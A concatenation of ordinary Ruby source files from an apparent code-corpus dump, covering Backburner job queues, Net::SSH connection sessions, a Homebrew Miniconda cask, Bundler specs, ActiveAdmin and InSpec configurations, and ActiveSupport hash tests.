base.instance_variable_set(:@queue_garbage_limit, nil)
base.instance_variable_set(:@queue_retry_limit, nil)
base.extend ClassMethods
Backburner::Worker.known_queue_classes << base
end
module ClassMethods
# Returns or assigns queue name for this job.
#
# @example
# queue "some.task.name"
# @klass.queue # => "some.task.name"
#
def queue(name=nil)
if name
@queue_name = name
else # accessor
(@queue_name.is_a?(Proc) ? @queue_name.call(self) : @queue_name) || Backburner.configuration.primary_queue
end
end
# Returns or assigns queue priority for this job
#
# @example
# queue_priority 120
# @klass.queue_priority # => 120
#
def queue_priority(pri=nil)
if pri
@queue_priority = pri
else # accessor
@queue_priority
end
end
# Returns or assigns queue respond_timeout for this job
#
# @example
# queue_respond_timeout 120
# @klass.queue_respond_timeout # => 120
#
def queue_respond_timeout(ttr=nil)
if ttr
@queue_respond_timeout = ttr
else # accessor
@queue_respond_timeout
end
end
# Returns or assigns queue max_job_retries for this job
#
# @example
# queue_max_job_retries 120
# @klass.queue_max_job_retries # => 120
#
def queue_max_job_retries(delay=nil)
if delay
@queue_max_job_retries = delay
else # accessor
@queue_max_job_retries
end
end
# Returns or assigns queue retry_delay for this job
#
# @example
# queue_retry_delay 120
# @klass.queue_retry_delay # => 120
#
def queue_retry_delay(delay=nil)
if delay
@queue_retry_delay = delay
else # accessor
@queue_retry_delay
end
end
# Returns or assigns queue retry_delay_proc for this job
#
# @example
# queue_retry_delay_proc lambda { |min_retry_delay, num_retries| min_retry_delay + (num_retries ** 2) }
# @klass.queue_retry_delay_proc # => lambda { |min_retry_delay, num_retries| min_retry_delay + (num_retries ** 2) }
#
def queue_retry_delay_proc(proc=nil)
if proc
@queue_retry_delay_proc = proc
else # accessor
@queue_retry_delay_proc
end
end
# Returns or assigns queue parallel active jobs limit (only ThreadsOnFork and Threading workers)
#
# @example
# queue_jobs_limit 5
# @klass.queue_jobs_limit # => 5
#
def queue_jobs_limit(limit=nil)
if limit
@queue_jobs_limit = limit
else #accessor
@queue_jobs_limit
end
end
# Returns or assigns queue jobs garbage limit (only ThreadsOnFork Worker)
#
# @example
# queue_garbage_limit 1000
# @klass.queue_garbage_limit # => 1000
#
def queue_garbage_limit(limit=nil)
if limit
@queue_garbage_limit = limit
else #accessor
@queue_garbage_limit
end
end
# Returns or assigns queue retry limit (only ThreadsOnFork worker)
#
# @example
# queue_retry_limit 6
# @klass.queue_retry_limit # => 6
#
def queue_retry_limit(limit=nil)
if limit
@queue_retry_limit = limit
else #accessor
@queue_retry_limit
end
end
end # ClassMethods
end # Queue
end # Backburner
| 28.253425 | 123 | 0.606303 |
5d848fd0107f26872c734f69d93f54742e7e7912 | 406 | # frozen_string_literal: true
require "factory_bot"
FactoryBot.define do
factory :alchemy_site, class: "Alchemy::Site" do
name { "A Site" }
host { "domain.com" }
trait :default do
public { true }
name { Alchemy::Config.get(:default_site)["name"] }
host { Alchemy::Config.get(:default_site)["host"] }
end
trait :public do
public { true }
end
end
end
| 18.454545 | 57 | 0.618227 |
ff0fdfc6fdc22ddb4cd9d4cef82f7bf14adbd259 | 102 | class TrainsController < ApplicationController
def show
render template: "trains/index"
end
end
| 12.75 | 46 | 0.784314 |
08abf5d31ec7a6f3722c4566e50be1c220225b49 | 188 | require 'spec_helper_acceptance'
describe 'cis_hardening_network class' do
context 'default parameters' do
it 'behaves idempotently' do
idempotent_apply(pp)
end
end
end
| 18.8 | 41 | 0.75 |
28114ebed4e62f3f81995f04a3b5822d65a1540e | 251 | class CreateTrades < ActiveRecord::Migration[6.0]
def change
create_table :trades do |t|
t.text :coin_name
t.decimal :current_price
t.integer :quantity
t.integer :user_id
t.timestamps null: false
end
end
end
| 19.307692 | 49 | 0.657371 |
edcf9b00d1f3aced60264a3ac9e28451341e7bba | 949 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html.
# Run `pod lib lint device_kit.podspec' to validate before publishing.
#
Pod::Spec.new do |s|
s.name = 'device_kit'
s.version = '0.1.1'
s.summary = 'Flutter plugin for Device.'
s.description = <<-DESC
Flutter plugin for Device.
DESC
s.homepage = 'http://example.com'
s.license = { :file => '../LICENSE' }
s.author = { 'Your Company' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.platform = :ios, '8.0'
s.subspec 'vendor' do |sp|
sp.frameworks = 'CoreTelephony'
end
# Flutter.framework does not contain a i386 slice.
s.pod_target_xcconfig = { 'DEFINES_MODULE' => 'YES', 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'i386' }
end
| 33.892857 | 105 | 0.591149 |
874cbc02a45ae0d950f1b5fb1894fbc24961de89 | 23,034 | require 'net/ssh/loggable'
require 'net/ssh/ruby_compat'
require 'net/ssh/connection/channel'
require 'net/ssh/connection/constants'
require 'net/ssh/service/forward'
module Net; module SSH; module Connection
# A session class representing the connection service running on top of
# the SSH transport layer. It manages the creation of channels (see
# #open_channel), and the dispatching of messages to the various channels.
# It also encapsulates the SSH event loop (via #loop and #process),
# and serves as a central point-of-reference for all SSH-related services (e.g.
# port forwarding, SFTP, SCP, etc.).
#
# You will rarely (if ever) need to instantiate this class directly; rather,
# you'll almost always use Net::SSH.start to initialize a new network
# connection, authenticate a user, and return a new connection session,
# all in one call.
#
# Net::SSH.start("localhost", "user") do |ssh|
# # 'ssh' is an instance of Net::SSH::Connection::Session
# ssh.exec! "/etc/init.d/some_process start"
# end
class Session
include Constants, Loggable
# The underlying transport layer abstraction (see Net::SSH::Transport::Session).
attr_reader :transport
# The map of options that were used to initialize this instance.
attr_reader :options
# The collection of custom properties for this instance. (See #[] and #[]=).
attr_reader :properties
# The map of channels, each key being the local-id for the channel.
attr_reader :channels #:nodoc:
# The map of listeners that the event loop knows about. See #listen_to.
attr_reader :listeners #:nodoc:
# The map of specialized handlers for opening specific channel types. See
# #on_open_channel.
attr_reader :channel_open_handlers #:nodoc:
# The list of callbacks for pending requests. See #send_global_request.
attr_reader :pending_requests #:nodoc:
class NilChannel
def initialize(session)
@session = session
end
def method_missing(sym, *args)
@session.lwarn { "ignoring request #{sym.inspect} for non-existent (closed?) channel; probably ssh server bug" }
end
end
# Create a new connection service instance atop the given transport
# layer. Initializes the listeners to be only the underlying socket object.
def initialize(transport, options={})
self.logger = transport.logger
@transport = transport
@options = options
@channel_id_counter = -1
@channels = Hash.new(NilChannel.new(self))
@listeners = { transport.socket => nil }
@pending_requests = []
@channel_open_handlers = {}
@on_global_request = {}
@properties = (options[:properties] || {}).dup
@max_pkt_size = (options.has_key?(:max_pkt_size) ? options[:max_pkt_size] : 0x8000)
@max_win_size = (options.has_key?(:max_win_size) ? options[:max_win_size] : 0x20000)
end
# Retrieves a custom property from this instance. This can be used to
# store additional state in applications that must manage multiple
# SSH connections.
def [](key)
@properties[key]
end
# Sets a custom property for this instance.
def []=(key, value)
@properties[key] = value
end
# Returns the name of the host that was given to the transport layer to
# connect to.
def host
transport.host
end
# Returns true if the underlying transport has been closed. Note that
# this can be a little misleading, since if the remote server has
# closed the connection, the local end will still think it is open
# until the next operation on the socket. Nevertheless, this method can
# be useful if you just want to know if _you_ have closed the connection.
def closed?
transport.closed?
end
# Closes the session gracefully, blocking until all channels have
# successfully closed, and then closes the underlying transport layer
# connection.
def close
info { "closing remaining channels (#{channels.length} open)" }
channels.each { |id, channel| channel.close }
loop(0.1) { channels.any? }
transport.close
end
# Performs a "hard" shutdown of the connection. In general, this should
# never be done, but it might be necessary (in a rescue clause, for instance,
# when the connection needs to close but you don't know the status of the
# underlying protocol's state).
def shutdown!
transport.shutdown!
end
# preserve a reference to Kernel#loop
alias :loop_forever :loop
# Returns +true+ if there are any channels currently active on this
# session. By default, this will not include "invisible" channels
# (such as those created by forwarding ports and such), but if you pass
# a +true+ value for +include_invisible+, then those will be counted.
#
# This can be useful for determining whether the event loop should continue
# to be run.
#
# ssh.loop { ssh.busy? }
def busy?(include_invisible=false)
if include_invisible
channels.any?
else
channels.any? { |id, ch| !ch[:invisible] }
end
end
# The main event loop. Calls #process until #process returns false. If a
# block is given, it is passed to #process, otherwise a default proc is
# used that just returns true if there are any channels active (see #busy?).
# The # +wait+ parameter is also passed through to #process (where it is
# interpreted as the maximum number of seconds to wait for IO.select to return).
#
# # loop for as long as there are any channels active
# ssh.loop
#
# # loop for as long as there are any channels active, but make sure
# # the event loop runs at least once per 0.1 second
# ssh.loop(0.1)
#
# # loop until ctrl-C is pressed
# int_pressed = false
# trap("INT") { int_pressed = true }
# ssh.loop(0.1) { not int_pressed }
def loop(wait=nil, &block)
running = block || Proc.new { busy? }
loop_forever { break unless process(wait, &running) }
end
# The core of the event loop. It processes a single iteration of the event
# loop. If a block is given, it should return false when the processing
# should abort, which causes #process to return false. Otherwise,
# #process returns true. The session itself is yielded to the block as its
# only argument.
#
# If +wait+ is nil (the default), this method will block until any of the
# monitored IO objects are ready to be read from or written to. If you want
# it to not block, you can pass 0, or you can pass any other numeric value
# to indicate that it should block for no more than that many seconds.
# Passing 0 is a good way to poll the connection, but if you do it too
# frequently it can make your CPU quite busy!
#
# This will also cause all active channels to be processed once each (see
# Net::SSH::Connection::Channel#on_process).
#
# # process multiple Net::SSH connections in parallel
# connections = [
# Net::SSH.start("host1", ...),
# Net::SSH.start("host2", ...)
# ]
#
# connections.each do |ssh|
# ssh.exec "grep something /in/some/files"
# end
#
# condition = Proc.new { |s| s.busy? }
#
# loop do
# connections.delete_if { |ssh| !ssh.process(0.1, &condition) }
# break if connections.empty?
# end
def process(wait=nil, &block)
return false unless preprocess(&block)
r = listeners.keys
w = r.select { |w2| w2.respond_to?(:pending_write?) && w2.pending_write? }
readers, writers, = Net::SSH::Compat.io_select(r, w, nil, wait)
postprocess(readers, writers)
end
# This is called internally as part of #process. It dispatches any
# available incoming packets, and then runs Net::SSH::Connection::Channel#process
# for any active channels. If a block is given, it is invoked at the
# start of the method and again at the end, and if the block ever returns
# false, this method returns false. Otherwise, it returns true.
def preprocess
return false if block_given? && !yield(self)
dispatch_incoming_packets
channels.each { |id, channel| channel.process unless channel.closing? }
return false if block_given? && !yield(self)
return true
end
# This is called internally as part of #process. It loops over the given
# arrays of reader IO's and writer IO's, processing them as needed, and
# then calls Net::SSH::Transport::Session#rekey_as_needed to allow the
# transport layer to rekey. Then returns true.
def postprocess(readers, writers)
Array(readers).each do |reader|
if listeners[reader]
listeners[reader].call(reader)
else
if reader.fill.zero?
reader.close
stop_listening_to(reader)
end
end
end
Array(writers).each do |writer|
writer.send_pending
end
transport.rekey_as_needed
return true
end
# Send a global request of the given type. The +extra+ parameters must
# be even in number, and conform to the same format as described for
# Net::SSH::Buffer.from. If a callback is not specified, the request will
# not require a response from the server, otherwise the server is required
# to respond and indicate whether the request was successful or not. This
# success or failure is indicated by the callback being invoked, with the
# first parameter being true or false (success, or failure), and the second
# being the packet itself.
#
# Generally, Net::SSH will manage global requests that need to be sent
# (e.g. port forward requests and such are handled in the Net::SSH::Service::Forward
# class, for instance). However, there may be times when you need to
# send a global request that isn't explicitly handled by Net::SSH, and so
# this method is available to you.
#
# ssh.send_global_request("[email protected]")
def send_global_request(type, *extra, &callback)
info { "sending global request #{type}" }
msg = Buffer.from(:byte, GLOBAL_REQUEST, :string, type.to_s, :bool, !callback.nil?, *extra)
send_message(msg)
pending_requests << callback if callback
self
end
# Requests that a new channel be opened. By default, the channel will be
# of type "session", but if you know what you're doing you can select any
# of the channel types supported by the SSH protocol. The +extra+ parameters
# must be even in number and conform to the same format as described for
# Net::SSH::Buffer.from. If a callback is given, it will be invoked when
# the server confirms that the channel opened successfully. The sole parameter
# for the callback is the channel object itself.
#
# In general, you'll use #open_channel without any arguments; the only
# time you'd want to set the channel type or pass additional initialization
# data is if you were implementing an SSH extension.
#
# channel = ssh.open_channel do |ch|
# ch.exec "grep something /some/files" do |ch, success|
# ...
# end
# end
#
# channel.wait
def open_channel(type="session", *extra, &on_confirm)
local_id = get_next_channel_id
channel = Channel.new(self, type, local_id, @max_pkt_size, @max_win_size, &on_confirm)
msg = Buffer.from(:byte, CHANNEL_OPEN, :string, type, :long, local_id,
:long, channel.local_maximum_window_size,
:long, channel.local_maximum_packet_size, *extra)
send_message(msg)
channels[local_id] = channel
end
# A convenience method for executing a command and interacting with it. If
# no block is given, all output is printed via $stdout and $stderr. Otherwise,
# the block is called for each data and extended data packet, with three
# arguments: the channel object, a symbol indicating the data type
# (:stdout or :stderr), and the data (as a string).
#
# Note that this method returns immediately, and requires an event loop
# (see Session#loop) in order for the command to actually execute.
#
# This is effectively identical to calling #open_channel, and then
# Net::SSH::Connection::Channel#exec, and then setting up the channel
# callbacks. However, for most uses, this will be sufficient.
#
# ssh.exec "grep something /some/files" do |ch, stream, data|
# if stream == :stderr
# puts "ERROR: #{data}"
# else
# puts data
# end
# end
def exec(command, &block)
open_channel do |channel|
channel.exec(command) do |ch, success|
raise "could not execute command: #{command.inspect}" unless success
channel.on_data do |ch2, data|
if block
block.call(ch2, :stdout, data)
else
$stdout.print(data)
end
end
channel.on_extended_data do |ch2, type, data|
if block
block.call(ch2, :stderr, data)
else
$stderr.print(data)
end
end
end
end
end
# Same as #exec, except this will block until the command finishes. Also,
# if a block is not given, this will return all output (stdout and stderr)
# as a single string.
#
# matches = ssh.exec!("grep something /some/files")
def exec!(command, &block)
block ||= Proc.new do |ch, type, data|
ch[:result] ||= ""
ch[:result] << data
end
channel = exec(command, &block)
channel.wait
return channel[:result]
end
# Enqueues a message to be sent to the server as soon as the socket is
# available for writing. Most programs will never need to call this, but
# if you are implementing an extension to the SSH protocol, or if you
# need to send a packet that Net::SSH does not directly support, you can
# use this to send it.
#
# ssh.send_message(Buffer.from(:byte, REQUEST_SUCCESS).to_s)
def send_message(message)
transport.enqueue_message(message)
end
# Adds an IO object for the event loop to listen to. If a callback
# is given, it will be invoked when the io is ready to be read, otherwise,
# the io will merely have its #fill method invoked.
#
# Any +io+ value passed to this method _must_ have mixed into it the
# Net::SSH::BufferedIo functionality, typically by calling #extend on the
# object.
#
# The following example executes a process on the remote server, opens
# a socket to somewhere, and then pipes data from that socket to the
# remote process' stdin stream:
#
# channel = ssh.open_channel do |ch|
# ch.exec "/some/process/that/wants/input" do |ch, success|
# abort "can't execute!" unless success
#
# io = TCPSocket.new(somewhere, port)
# io.extend(Net::SSH::BufferedIo)
# ssh.listen_to(io)
#
# ch.on_process do
# if io.available > 0
# ch.send_data(io.read_available)
# end
# end
#
# ch.on_close do
# ssh.stop_listening_to(io)
# io.close
# end
# end
# end
#
# channel.wait
def listen_to(io, &callback)
listeners[io] = callback
end
# Removes the given io object from the listeners collection, so that the
# event loop will no longer monitor it.
def stop_listening_to(io)
listeners.delete(io)
end
# Returns a reference to the Net::SSH::Service::Forward service, which can
# be used for forwarding ports over SSH.
def forward
@forward ||= Service::Forward.new(self)
end
# Registers a handler to be invoked when the server wants to open a
# channel on the client. The callback receives the connection object,
# the new channel object, and the packet itself as arguments, and should
# raise ChannelOpenFailed if it is unable to open the channel for some
# reason. Otherwise, the channel will be opened and a confirmation message
# sent to the server.
#
# This is used by the Net::SSH::Service::Forward service to open a channel
# when a remote forwarded port receives a connection. However, you are
# welcome to register handlers for other channel types, as needed.
def on_open_channel(type, &block)
channel_open_handlers[type] = block
end
# Registers a handler to be invoked when the server sends a global request
# of the given type. The callback receives the request data as the first
# parameter, and true/false as the second (indicating whether a response
# is required). If the callback sends the response, it should return
# :sent. Otherwise, if it returns true, REQUEST_SUCCESS will be sent, and
# if it returns false, REQUEST_FAILURE will be sent.
def on_global_request(type, &block)
old, @on_global_request[type] = @on_global_request[type], block
old
end
private
# Read all pending packets from the connection and dispatch them as
# appropriate. Returns as soon as there are no more pending packets.
def dispatch_incoming_packets
while packet = transport.poll_message
unless MAP.key?(packet.type)
raise Net::SSH::Exception, "unexpected response #{packet.type} (#{packet.inspect})"
end
send(MAP[packet.type], packet)
end
end
# Returns the next available channel id to be assigned, and increments
# the counter.
def get_next_channel_id
@channel_id_counter += 1
end
# Invoked when a global request is received. The registered global
# request callback will be invoked, if one exists, and the necessary
# reply returned.
def global_request(packet)
info { "global request received: #{packet[:request_type]} #{packet[:want_reply]}" }
callback = @on_global_request[packet[:request_type]]
result = callback ? callback.call(packet[:request_data], packet[:want_reply]) : false
if result != :sent && result != true && result != false
raise "expected global request handler for `#{packet[:request_type]}' to return true, false, or :sent, but got #{result.inspect}"
end
if packet[:want_reply] && result != :sent
msg = Buffer.from(:byte, result ? REQUEST_SUCCESS : REQUEST_FAILURE)
send_message(msg)
end
end
# Invokes the next pending request callback with +true+.
def request_success(packet)
info { "global request success" }
callback = pending_requests.shift
callback.call(true, packet) if callback
end
# Invokes the next pending request callback with +false+.
def request_failure(packet)
info { "global request failure" }
callback = pending_requests.shift
callback.call(false, packet) if callback
end
# Called when the server wants to open a channel. If no registered
# channel handler exists for the given channel type, CHANNEL_OPEN_FAILURE
# is returned, otherwise the callback is invoked and everything proceeds
# accordingly.
def channel_open(packet)
info { "channel open #{packet[:channel_type]}" }
local_id = get_next_channel_id
channel = Channel.new(self, packet[:channel_type], local_id, @max_pkt_size, @max_win_size)
channel.do_open_confirmation(packet[:remote_id], packet[:window_size], packet[:packet_size])
callback = channel_open_handlers[packet[:channel_type]]
if callback
begin
callback[self, channel, packet]
rescue ChannelOpenFailed => err
failure = [err.code, err.reason]
else
channels[local_id] = channel
msg = Buffer.from(:byte, CHANNEL_OPEN_CONFIRMATION, :long, channel.remote_id, :long, channel.local_id, :long, channel.local_maximum_window_size, :long, channel.local_maximum_packet_size)
end
else
failure = [3, "unknown channel type #{channel.type}"]
end
if failure
error { failure.inspect }
msg = Buffer.from(:byte, CHANNEL_OPEN_FAILURE, :long, channel.remote_id, :long, failure[0], :string, failure[1], :string, "")
end
send_message(msg)
end
def channel_open_confirmation(packet)
info { "channel_open_confirmation: #{packet[:local_id]} #{packet[:remote_id]} #{packet[:window_size]} #{packet[:packet_size]}" }
channel = channels[packet[:local_id]]
channel.do_open_confirmation(packet[:remote_id], packet[:window_size], packet[:packet_size])
end
def channel_open_failure(packet)
error { "channel_open_failed: #{packet[:local_id]} #{packet[:reason_code]} #{packet[:description]}" }
channel = channels.delete(packet[:local_id])
channel.do_open_failed(packet[:reason_code], packet[:description])
end
def channel_window_adjust(packet)
info { "channel_window_adjust: #{packet[:local_id]} +#{packet[:extra_bytes]}" }
channels[packet[:local_id]].do_window_adjust(packet[:extra_bytes])
end
def channel_request(packet)
info { "channel_request: #{packet[:local_id]} #{packet[:request]} #{packet[:want_reply]}" }
channels[packet[:local_id]].do_request(packet[:request], packet[:want_reply], packet[:request_data])
end
def channel_data(packet)
info { "channel_data: #{packet[:local_id]} #{packet[:data].length}b" }
channels[packet[:local_id]].do_data(packet[:data])
end
def channel_extended_data(packet)
info { "channel_extended_data: #{packet[:local_id]} #{packet[:data_type]} #{packet[:data].length}b" }
channels[packet[:local_id]].do_extended_data(packet[:data_type], packet[:data])
end
def channel_eof(packet)
info { "channel_eof: #{packet[:local_id]}" }
channels[packet[:local_id]].do_eof
end
def channel_close(packet)
info { "channel_close: #{packet[:local_id]}" }
channel = channels[packet[:local_id]]
channel.close
channels.delete(packet[:local_id])
channel.do_close
end
def channel_success(packet)
info { "channel_success: #{packet[:local_id]}" }
channels[packet[:local_id]].do_success
end
def channel_failure(packet)
info { "channel_failure: #{packet[:local_id]}" }
channels[packet[:local_id]].do_failure
end
MAP = Constants.constants.inject({}) do |memo, name|
value = const_get(name)
next unless Integer === value
memo[value] = name.downcase.to_sym
memo
end
end
end; end; end
| 38.262458 | 198 | 0.654815 |
ac64d70c7d82998044b6eaabeb097e82567f42d0 | 1,560 | cask "miniconda" do
arch = Hardware::CPU.intel? ? "x86_64" : "arm64"
version "py39_4.12.0"
if Hardware::CPU.intel?
sha256 "007bae6f18dc7b6f2ca6209b5a0c9bd2f283154152f82becf787aac709a51633"
else
sha256 "4bd112168cc33f8a4a60d3ef7e72b52a85972d588cd065be803eb21d73b625ef"
end
url "https://repo.anaconda.com/miniconda/Miniconda3-#{version}-MacOSX-#{arch}.sh",
verified: "repo.anaconda.com/miniconda/"
name "Continuum Analytics Miniconda"
desc "Minimal installer for conda"
homepage "https://conda.io/miniconda.html"
# This regex restricts matching to a specific Python version. This will need
# to be updated when the prefix changes in the latest version at the top of:
# https://repo.anaconda.com/miniconda/Miniconda3-latest-MacOSX-#{arch}.sh
livecheck do
url "https://repo.anaconda.com/miniconda/"
if Hardware::CPU.intel?
regex(/>\s*Miniconda3-(py39[._-]\d+(?:\.\d+)+)-MacOSX-#{arch}\.sh\s*</i)
else
regex(/>\s*Miniconda3-(py38[._-]\d+(?:\.\d+)+)-MacOSX-#{arch}\.sh\s*</i)
end
end
auto_updates true
conflicts_with cask: "miniforge"
container type: :naked
installer script: {
executable: "Miniconda3-#{version}-MacOSX-#{arch}.sh",
args: ["-b", "-p", "#{caskroom_path}/base"],
}
binary "#{caskroom_path}/base/condabin/conda"
uninstall delete: "#{caskroom_path}/base"
zap trash: [
"~/.condarc",
"~/.conda",
"~/.continuum",
]
caveats <<~EOS
Please run the following to setup your shell:
conda init "$(basename "${SHELL}")"
EOS
end
| 30 | 84 | 0.669872 |
d5207420c93593205ddf5c44143d505d13834635 | 4,339 | require "spec_helper"
describe "bundle install across platforms" do
it "maintains the same lockfile if all gems are compatible across platforms" do
lockfile <<-G
GEM
remote: file:#{gem_repo1}/
specs:
rack (0.9.1)
PLATFORMS
#{not_local}
DEPENDENCIES
rack
G
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "rack"
G
should_be_installed "rack 0.9.1"
end
it "pulls in the correct platform specific gem" do
lockfile <<-G
GEM
remote: file:#{gem_repo1}
specs:
platform_specific (1.0)
platform_specific (1.0-java)
platform_specific (1.0-x86-mswin32)
PLATFORMS
ruby
DEPENDENCIES
platform_specific
G
simulate_platform "java"
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "platform_specific"
G
should_be_installed "platform_specific 1.0 JAVA"
end
it "works with gems that have different dependencies" do
simulate_platform "java"
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "nokogiri"
G
should_be_installed "nokogiri 1.4.2 JAVA", "weakling 0.0.3"
simulate_new_machine
simulate_platform "ruby"
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "nokogiri"
G
should_be_installed "nokogiri 1.4.2"
should_not_be_installed "weakling"
end
it "works the other way with gems that have different dependencies" do
simulate_platform "ruby"
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "nokogiri"
G
simulate_platform "java"
bundle "install"
should_be_installed "nokogiri 1.4.2 JAVA", "weakling 0.0.3"
end
it "fetches gems again after changing the version of Ruby" do
gemfile <<-G
source "file://#{gem_repo1}"
gem "rack", "1.0.0"
G
bundle "install --path vendor/bundle"
vendored_gems("gems/rack-1.0.0").should exist
end
it "works after switching Rubies" do
gemfile <<-G
source "file://#{gem_repo1}"
gem "rack", "1.0.0"
G
bundle "install --path vendor/bundle"
new_version = Gem::ConfigMap[:ruby_version] == "1.8" ? "1.9.1" : "1.8"
FileUtils.mv(vendored_gems, bundled_app("vendor/bundle/#{Gem.ruby_engine}/#{new_version}"))
bundle "install --path ./vendor/bundle"
vendored_gems("gems/rack-1.0.0").should exist
end
end
describe "bundle install with platform conditionals" do
it "installs gems tagged w/ the current platforms" do
install_gemfile <<-G
source "file://#{gem_repo1}"
platforms :#{local_tag} do
gem "nokogiri"
end
G
should_be_installed "nokogiri 1.4.2"
end
it "does not install gems tagged w/ another platforms" do
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "rack"
platforms :#{not_local_tag} do
gem "nokogiri"
end
G
should_be_installed "rack 1.0"
should_not_be_installed "nokogiri 1.4.2"
end
it "installs gems tagged w/ the current platforms inline" do
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "nokogiri", :platforms => :#{local_tag}
G
should_be_installed "nokogiri 1.4.2"
end
it "does not install gems tagged w/ another platforms inline" do
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "rack"
gem "nokogiri", :platforms => :#{not_local_tag}
G
should_be_installed "rack 1.0"
should_not_be_installed "nokogiri 1.4.2"
end
it "installs gems tagged w/ the current platform inline" do
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "nokogiri", :platform => :#{local_tag}
G
should_be_installed "nokogiri 1.4.2"
end
it "doesn't install gems tagged w/ another platform inline" do
install_gemfile <<-G
source "file://#{gem_repo1}"
gem "nokogiri", :platform => :#{not_local_tag}
G
should_not_be_installed "nokogiri 1.4.2"
end
it "does not blow up on sources with all platform-excluded specs" do
build_git "foo"
install_gemfile <<-G
platform :#{not_local_tag} do
gem "foo", :git => "#{lib_path('foo-1.0')}"
end
G
bundle :show, :exitstatus => true
exitstatus.should == 0
end
end
| 22.481865 | 95 | 0.628255 |
ab8f0fd210665ecc6bd3921d66218b927b470975 | 1,594 | Pod::Spec.new do |s|
s.name = "RxSwift"
s.version = "5.0.2"
s.summary = "RxSwift is a Swift implementation of Reactive Extensions"
s.description = <<-DESC
This is a Swift port of [ReactiveX.io](https://github.com/ReactiveX)
Like the original [Rx](https://github.com/Reactive-extensions/Rx.Net), its intention is to enable easy composition of asynchronous operations and event streams.
It tries to port as many concepts from the original Rx as possible, but some concepts were adapted for more pleasant and performant integration with iOS/macOS/Linux environment.
Probably the best analogy for those who have never heard of Rx would be:
```
git diff | grep bug | less # linux pipes - programs communicate by sending
# sequences of bytes, words, lines, '\0' terminated strings...
```
would become if written in RxSwift
```
gitDiff().grep("bug").less // sequences of swift objects
```
DESC
s.homepage = "https://github.com/ReactiveX/RxSwift"
s.license = 'MIT'
s.author = { "Krunoslav Zaher" => "[email protected]" }
s.source = { :git => "[email protected]:szfy_ios/RxSwift.git", :tag => s.version.to_s }
s.requires_arc = true
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.9'
s.watchos.deployment_target = '3.0'
s.tvos.deployment_target = '9.0'
s.source_files = 'RxSwift/**/*.swift', 'Platform/**/*.swift'
s.exclude_files = 'RxSwift/Platform/**/*.swift'
s.swift_version = '5.0'
end
| 39.85 | 177 | 0.644918 |
33a85f5abde99d316e4cd5a0b165988f34c3f752 | 371 | # frozen_string_literal: true
module Nonnative
class Service
def initialize(service)
@service = service
@timeout = Nonnative::Timeout.new(service.timeout)
end
def name
service.name
end
protected
attr_reader :service, :timeout
def wait_start
sleep 0.1
end
def wait_stop
sleep 0.1
end
end
end
| 13.740741 | 56 | 0.633423 |
181beec32aeecaae9c2cae1cf219f1a4bd684550 | 1,250 | # frozen_string_literal: true
ActiveAdmin.register Author do
permit_params :name,
:email,
:age,
:avatar,
profile_attributes: %i[id description _destroy],
posts_attributes: %i[id title description]
index do
selectable_column
id_column
column :name
column :email
column :created_at
actions
end
filter :name
filter :created_at
show do
attributes_table do
row :name
row :email
row :age
row :avatar do |record|
image_tag url_for(record.avatar), style: 'max-width:800px;max-height:500px' if record.avatar.attached?
end
row :created_at
row :updated_at
row :profile
row :posts
end
active_admin_comments
end
form do |f|
f.inputs do
f.input :name
f.input :email
f.input :age
f.input :avatar,
as: :file,
hint: (object.avatar.attached? ? "Current: #{object.avatar.filename}" : nil)
end
f.has_many :profile, allow_destroy: true do |ff|
ff.input :description
end
f.has_many :posts do |fp|
fp.input :title
fp.input :description, as: :trumbowyg
end
f.actions
end
end
| 21.551724 | 110 | 0.5896 |
1d0921a66a59733a03260ddea844ecbe1ce25b7f | 1,463 | control 'VCSA-70-000070' do
title 'The vCenter Server must prohibit password reuse for a minimum of five generations.'
desc "
Password complexity, or strength, is a measure of the effectiveness of a password in resisting attempts at guessing and brute-force attacks.
To meet password policy requirements, passwords need to be changed at specific policy-based intervals.
If the information system or application allows the user to consecutively reuse their password when that password has exceeded its defined lifetime, the end result is a password that is not changed as per policy requirements.
"
desc 'rationale', ''
desc 'check', "
From the vSphere Client, go to Administration >> Single Sign On >> Configuration >> Local Accounts >> Password Policy.
View the value of the \"Restrict reuse\" setting.
If the \"Restrict reuse\" policy is not set to \"5\" or more, this is a finding.
"
desc 'fix', "
From the vSphere Client, go to Administration >> Single Sign On >> Configuration >> Local Accounts >> Password Policy.
Click \"Edit\" and enter \"5\" into the \"Restrict reuse\" setting and click \"OK\".
"
impact 0.5
tag severity: 'medium'
tag gtitle: 'SRG-APP-000165'
tag gid: nil
tag rid: nil
tag stig_id: 'VCSA-70-000070'
tag cci: ['CCI-000200']
tag nist: ['IA-5 (1) (e)']
describe 'This check is a manual or policy based check' do
skip 'This must be reviewed manually'
end
end
| 40.638889 | 229 | 0.710868 |
085779603658f44f0ba8942c7710664c22582334 | 53,172 | require 'abstract_unit'
require 'active_support/core_ext/hash'
require 'bigdecimal'
require 'active_support/core_ext/string/access'
require 'active_support/ordered_hash'
require 'active_support/core_ext/object/conversions'
require 'active_support/core_ext/object/deep_dup'
require 'active_support/inflections'
class HashExtTest < ActiveSupport::TestCase
class IndifferentHash < ActiveSupport::HashWithIndifferentAccess
end
class SubclassingArray < Array
end
class SubclassingHash < Hash
end
class NonIndifferentHash < Hash
def nested_under_indifferent_access
self
end
end
def setup
@strings = { 'a' => 1, 'b' => 2 }
@nested_strings = { 'a' => { 'b' => { 'c' => 3 } } }
@symbols = { :a => 1, :b => 2 }
@nested_symbols = { :a => { :b => { :c => 3 } } }
@mixed = { :a => 1, 'b' => 2 }
@nested_mixed = { 'a' => { :b => { 'c' => 3 } } }
@fixnums = { 0 => 1, 1 => 2 }
@nested_fixnums = { 0 => { 1 => { 2 => 3} } }
@illegal_symbols = { [] => 3 }
@nested_illegal_symbols = { [] => { [] => 3} }
@upcase_strings = { 'A' => 1, 'B' => 2 }
@nested_upcase_strings = { 'A' => { 'B' => { 'C' => 3 } } }
end
def test_methods
h = {}
